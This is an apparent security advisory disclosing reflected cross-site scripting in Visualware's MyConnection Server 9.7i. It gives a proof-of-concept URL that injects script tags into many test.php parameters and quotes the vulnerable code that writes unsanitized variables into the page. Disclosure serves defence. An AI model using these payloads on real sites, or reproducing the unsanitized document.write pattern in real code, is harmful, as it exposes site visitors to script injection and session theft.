Author: 1N3
Website: http://treadstonesecurity.blogspot.ca
Vender Website: http://www.visualware.com/
Affected Product: MyConnection Server
Affected Version: 9.7i (others may also be vulnerable)

ABOUT:
MyConnection Server (MCS) delivers a broad range of support managed automated and user initiated self-help connection testing and monitoring services directly via the browser to any online customer/location anywhere in the world. Due to a failure to sanitize certain GET variables passed to the connection test page (usually test.php), it is possible to inject client side javascript to run in the context of the user browsing the website. Several parameters including testtype, ver, cm, map, lines, duration and others appear to be vulnerable.

POC:
http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1"><script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><script>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><script>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1"><script>alert(1);</script>

VULNERABLE CODE:

* Both voiplines and testlength are written to the end user without being properly sanitized and thus vulnerable to reflective XSS.

<td valign="top" width="30%"><b>Current
    Settings</b>
          <br>
          <br>
          <b>VoIP Lines Simulated</b>:
          <script type="text/javascript"> document.write(voiplines); </script><br>
          <b>Test Length</b>:
          <script type="text/javascript"> document.write(testlength); </script><br>
          <b>Codec</b>:
          <script type="text/javascript"> if (codec == "g711") { document.write(nameg711); }
    else { document.write(nameg729); }
          </script><br>
          </td>
          <td align="left" width="70%">
          <p align="center">
<script>